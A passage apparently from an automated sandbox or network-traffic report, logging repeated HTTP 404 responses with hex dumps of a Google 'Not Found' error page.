31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 